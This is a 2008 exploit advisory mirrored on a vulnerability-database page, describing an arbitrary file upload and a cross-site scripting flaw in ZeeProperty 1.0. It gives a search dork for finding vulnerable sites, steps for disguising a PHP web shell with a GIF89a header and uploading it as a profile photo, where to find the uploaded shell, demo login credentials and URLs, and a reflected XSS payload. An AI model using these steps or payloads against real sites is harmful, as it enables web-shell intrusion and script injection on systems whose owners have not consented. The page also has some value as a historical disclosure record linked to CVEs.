Lucene search
ZoRLuEDB-ID:7058HistoryNov 08, 2008 - 12:00 a.m.
zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting
2008-11-0800:00:00
ZoRLu
www.exploit-db.com
37
AI Score
7.4
Confidence
Low
ZEEPROPERTY v1.0 remote file Upload & XSS
author: ZoRLu msn: [email protected]
home: www.z0rlu.blogspot.com
dork: "Designed & Developed by Zeeways.com"
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_sheell.php
after login to site and you change your profile ( direckt link: localhost/viewprofile.php )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/companylogo/[id].php
example for demo:
user: zeeways
passwd: testing:
change profile direckt link: http://www.zeeproperty.com/viewprofile.php
and your_shell link:
http://www.zeeproperty.com/companylogo/5622365.php
XSS for demo:
http://www.zeeproperty.com/view_prop_details.php?propid="><script>alert()</script>
thanks: str0ke & yildirimordulari.org & darkc0de.com
# milw0rm.com [2008-11-08]Related
cve
cve
CVE-2008-6914
2009-08-07 19:00:00
CVE-2008-6915
2009-08-07 19:00:01
prion
prion
Unrestricted file upload
2009-08-07 19:00:00
Cross site scripting
2009-08-07 19:00:00
nvd
nvd
CVE-2008-6914
2009-08-07 19:00:00
CVE-2008-6915
2009-08-07 19:00:01
cvelist
cvelist
CVE-2008-6915
2009-08-07 18:33:00
CVE-2008-6914
2009-08-07 18:33:00